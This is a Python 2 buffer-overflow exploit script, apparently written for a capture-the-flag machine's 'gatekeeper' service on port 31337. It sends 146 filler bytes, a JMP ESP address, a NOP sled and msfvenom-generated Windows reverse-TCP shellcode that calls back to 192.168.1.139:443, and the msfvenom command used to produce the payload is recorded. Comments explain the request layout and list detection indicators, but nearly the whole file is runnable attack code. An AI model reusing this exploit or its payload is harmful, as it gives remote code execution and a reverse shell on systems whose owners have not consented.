#!/usr/bin/python
import socket,sys
from time import sleep
# Flat exploit script: connects to a network service and sends one oversized
# request built from filler, a return-address overwrite, a NOP sled and a
# msfvenom-generated payload. Everything below runs at import time.
ip="192.168.1.59"   # target host the script connects to
port=31337          # target port; presumably the "gatekeeper" service named in the filename -- not confirmed here
esp ="\xC3\x14\x04\x08" #JMP ESP adress in littleendian format
# The four bytes above spell 0x080414C3 (little-endian); the author's comment
# says it is a JMP ESP gadget, placed at offset 146 so that, presumably, the
# saved return address is overwritten and execution lands on the sled below.
nops = "\x90"*16    # 16-byte NOP sled sitting between the overwritten address and the payload
#badchar_test = "" #start with empty string
#badchars = [0x00, 0x0A] #every time bad...
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.139 LPORT=443 EXITFUNC=thread -b '\x00\x0A' -f python --var-name shellcode EXITFUNC=thread
# Payload produced by the msfvenom command recorded above: a Windows reverse
# TCP shell calling back to 192.168.1.139:443 (LHOST/LPORT), encoded to avoid
# the bytes \x00 and \x0A. From a detection standpoint the observable
# indicators of a run are a single unusually long request to port 31337
# containing 146 bytes of 0x41 followed by 0x90s, and -- on success -- a new
# outbound connection from the target to 192.168.1.139:443, presumably from
# the exploited service process.
shellcode = b""
shellcode += b"\xd9\xc6\xbe\x9f\x8f\x39\xeb\xd9\x74\x24\xf4"
shellcode += b"\x5f\x31\xc9\xb1\x52\x83\xef\xfc\x31\x77\x13"
shellcode += b"\x03\xe8\x9c\xdb\x1e\xea\x4b\x99\xe1\x12\x8c"
shellcode += b"\xfe\x68\xf7\xbd\x3e\x0e\x7c\xed\x8e\x44\xd0"
shellcode += b"\x02\x64\x08\xc0\x91\x08\x85\xe7\x12\xa6\xf3"
shellcode += b"\xc6\xa3\x9b\xc0\x49\x20\xe6\x14\xa9\x19\x29"
shellcode += b"\x69\xa8\x5e\x54\x80\xf8\x37\x12\x37\xec\x3c"
shellcode += b"\x6e\x84\x87\x0f\x7e\x8c\x74\xc7\x81\xbd\x2b"
shellcode += b"\x53\xd8\x1d\xca\xb0\x50\x14\xd4\xd5\x5d\xee"
shellcode += b"\x6f\x2d\x29\xf1\xb9\x7f\xd2\x5e\x84\x4f\x21"
shellcode += b"\x9e\xc1\x68\xda\xd5\x3b\x8b\x67\xee\xf8\xf1"
shellcode += b"\xb3\x7b\x1a\x51\x37\xdb\xc6\x63\x94\xba\x8d"
shellcode += b"\x68\x51\xc8\xc9\x6c\x64\x1d\x62\x88\xed\xa0"
shellcode += b"\xa4\x18\xb5\x86\x60\x40\x6d\xa6\x31\x2c\xc0"
shellcode += b"\xd7\x21\x8f\xbd\x7d\x2a\x22\xa9\x0f\x71\x2b"
shellcode += b"\x1e\x22\x89\xab\x08\x35\xfa\x99\x97\xed\x94"
shellcode += b"\x91\x50\x28\x63\xd5\x4a\x8c\xfb\x28\x75\xed"
shellcode += b"\xd2\xee\x21\xbd\x4c\xc6\x49\x56\x8c\xe7\x9f"
shellcode += b"\xf9\xdc\x47\x70\xba\x8c\x27\x20\x52\xc6\xa7"
shellcode += b"\x1f\x42\xe9\x6d\x08\xe9\x10\xe6\xf7\x46\x1b"
shellcode += b"\x7d\x9f\x94\x1b\x80\xdb\x10\xfd\xe8\x0b\x75"
shellcode += b"\x56\x85\xb2\xdc\x2c\x34\x3a\xcb\x49\x76\xb0"
shellcode += b"\xf8\xae\x39\x31\x74\xbc\xae\xb1\xc3\x9e\x79"
shellcode += b"\xcd\xf9\xb6\xe6\x5c\x66\x46\x60\x7d\x31\x11"
shellcode += b"\x25\xb3\x48\xf7\xdb\xea\xe2\xe5\x21\x6a\xcc"
shellcode += b"\xad\xfd\x4f\xd3\x2c\x73\xeb\xf7\x3e\x4d\xf4"
shellcode += b"\xb3\x6a\x01\xa3\x6d\xc4\xe7\x1d\xdc\xbe\xb1"
shellcode += b"\xf2\xb6\x56\x47\x39\x09\x20\x48\x14\xff\xcc"
shellcode += b"\xf9\xc1\x46\xf3\x36\x86\x4e\x8c\x2a\x36\xb0"
shellcode += b"\x47\xef\x56\x53\x4d\x1a\xff\xca\x04\xa7\x62"
shellcode += b"\xed\xf3\xe4\x9a\x6e\xf1\x94\x58\x6e\x70\x90"
shellcode += b"\x25\x28\x69\xe8\x36\xdd\x8d\x5f\x36\xf4"
# Request layout: 146 filler bytes up to the overwritten address, the 4-byte
# JMP ESP address, the 16-byte sled, then the 351-byte payload above --
# 146 + 4 + 16 + 351 = 517 bytes before the CRLF appended in send() below.
# NOTE: this is Python 2 code (print statement below); mixing "" and b""
# literals in this concatenation relies on Python 2 str semantics.
bof = "A"*146 + esp + nops + shellcode
#shellcode length can be 844
#badchar = x00x0a
try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.connect((ip,port))
    # Leftover wording from a fuzzing stage: it prints len(bof), the size of
    # the fixed request above, not a fuzz iteration length.
    print "Fuzzing with "+str(len(bof))+" Characters"
    # The whole request goes out as one line; the trailing CRLF presumably
    # terminates whatever command/line the service reads -- not confirmed here.
    s.send(bof + '\r\n')
    s.recv(1024)  # read and discard up to 1 KiB of whatever the service answers
    s.close()
except:
    # Bare except: catches every exception, including KeyboardInterrupt and
    # SystemExit, and drops the error details, so a refused connection, a
    # reset during send() and a bug in this script all print the same text.
    # The socket is also left unclosed on this path, and the process still
    # exits with status 0, so a caller cannot tell failure from success.
    print "Some Error Occured"
    sys.exit(0)